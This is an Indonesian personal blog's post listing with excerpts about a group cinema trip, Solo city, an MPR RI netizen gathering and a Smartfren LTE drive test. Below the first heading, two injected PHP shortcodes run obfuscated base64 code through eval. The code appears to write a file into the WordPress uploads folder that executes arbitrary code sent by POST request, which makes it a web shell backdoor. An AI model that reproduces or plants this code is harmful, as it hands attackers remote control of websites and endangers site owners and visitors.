#eh Udah Akhir Tahun Aja

[insert_php]@eval(base64_decode(‘JGZpbGUgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLiIvd3AtY29udGVudC91cGxvYWRzLzRwNDI2NjJmLnBocCI7JGRhdGEgPSAiUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3ljMk1qQTRhamhzWmlkZEtUcy9QZz09IjskYmFzZWRlY29kZWRhdGEgPSBiYXNlNjRfZGVjb2RlKCRkYXRhKTtmaWxlX3B1dF9jb250ZW50cyAoJGZpbGUsICRiYXNlZGVjb2RlZGF0YSk7’));[/insert_php][php]@eval(base64_decode(‘JGZpbGUgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLiIvd3AtY29udGVudC91cGxvYWRzLzRwNDI2NjJmLnBocCI7JGRhdGEgPSAiUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3ljMk1qQTRhamhzWmlkZEtUcy9QZz09IjskYmFzZWRlY29kZWRhdGEgPSBiYXNlNjRfZGVjb2RlKCRkYXRhKTtmaWxlX3B1dF9jb250ZW50cyAoJGZpbGUsICRiYXNlZGVjb2RlZGF0YSk7’));[/php]

Nonbar Ngenest yang Bukan Ngenes Gitu Sih

Nonton bareng alias nonbar, buat aku itu merupakan acara yang paling dinanti-nanti 😀 . Yang jelas, namanya nonbar itu nonton bareng rame-rame di bioskop, bukannya nonton sendirian kayak biasanya gitu sih #eh. Cuman, namanya nonbar itu kita harus ekstra sabar kalo temen nonton kita itu datengnya telat, trus bolak-balik ke toilet, ribet soal makanan yang mau dibeli, dan yang pasti paling malesinnya adalah udah siap mau nonton tapi belum beli tiket untuk nonton film-film paling laris 🙁 .

Read more

#Nyetrit di Kutho Solo

Kadang sering bingung penyebutan Surakarta atau Solo, yaah semoga aja ada yang mau menjelaskan tentang perbedaan nama tersebut.

Sebut saja #kotasolo, tempat ini buat aku menyimpan banyak cerita yang masih belum banyak aku ketahui, salah satunya seperti : menurut penjelasan dari abdi dalem Keraton, Kota ini dulunya sangat kuat sekali sampai akhirnya terjadi perpecahan kecil yang kemudian menjadi Ngayogyakarta. Nah dari situlah sejarah dimulai dan kemewahan kota Solo dengan karakternya mulai terangkat. Read more

#eh Ada MPR RI Netizen Gathering

Sebenernya, ini merupakan kegembiraan tersendiri sih, ketika mendapatkan sebuah undangan gathering bersama blogger-blogger yang berasal dari berbagai macam daerah. Terlebih lagi yang mengundang acara tersebut adalah MPR RI, aku bisa apa coba ?

MPR RI yang merupakan sebuah lembaga resmi / lembaga tinggi negara kok tumben-tumbennya mengundang para blogger ini berkumpul, ada apakah ? nah to, penasaran kan ??

Awalnya, info gathering tersebut datang lewat link yang dishare oleh temen HelloSemarang dan kusambutlah dengan iseng ikutan mengisi link tersebut yang nantinya akan dipilihin lagi dari panitia acara yang kemudian akan diberi pemberitahuan secara personal lewat email, dan akhirnya akupun masuk menjadi salah satu yang diundang .. yeaay … hehehe …

Dari obrolan temen-temen, menjadi sebuah bahasan bahwasanya nantinya akan membahas mengenai 4 pilar kebangsaan. Dari situ aku pun makin penasaran, apa sih 4 pilar kebangsaan tersebut ? sampai akhirnya kepada mbah pun aku mencari tahu, dan sepertinya acara tersebut merupakan rangkaian sosialisasi tentang 4 pilar kebangsaan yang diadakan oleh humas MPR RI.

Read more

Drive Test Jaringan 4G LTE Smartfren di Semarang

Kalo mau terus terang, smartphone yg berlabel andromax keluaran Smartfren ini sudah menjadi sahabat beberapa tahun yang lalu sampai sekarang. Ada cerita yang lucu sebenernya di balik henpon ini.

Saat itu aku masih kerja di salah satu media, dan pada dulu hingga saat itu aku punya prinsip gak usah neko-neko punya smartphone, ntar tagihan makin mbengkak dan henpon semakin banyak. Pikirku, yang namanya online itu tetap paling nyaman yaa dengan menggunakan laptop. Sampai suatu saat, kantor punya acara awarding yang sponsor besarnya adalah Smartfren itu sendiri, dan tau sendirilah dari acara itu membuahkan puluhan smartphone sebagai barter. Karena Manager saat itu menawarkan tawaran yang menarik untuk memiliki salah satu smartphone tersebut, gak ada salahnya dong aku ambil satu untuk iseng-iseng aja.

Read more